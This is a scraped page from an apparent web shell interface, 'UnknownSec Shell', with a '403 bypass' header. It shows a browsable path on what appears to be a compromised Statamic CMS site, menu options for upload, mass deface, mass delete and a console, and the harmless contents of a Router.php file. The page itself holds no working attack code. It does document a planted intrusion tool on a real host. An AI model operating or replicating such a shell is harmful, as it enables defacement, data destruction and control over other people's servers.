shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Mixins
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Router.php
<?php namespace Statamic\Mixins; use Statamic\Http\Controllers\FrontendController; use Statamic\Support\Str; class Router { public function statamic() { return function ($uri, $view = null, $data = []) { if (! $view) { $view = Str::of($uri)->ltrim('/'); } return $this->get($uri, [FrontendController::class, 'route']) ->defaults('view', $view) ->defaults('data', $data); }; } }
© 2026 UnknownSec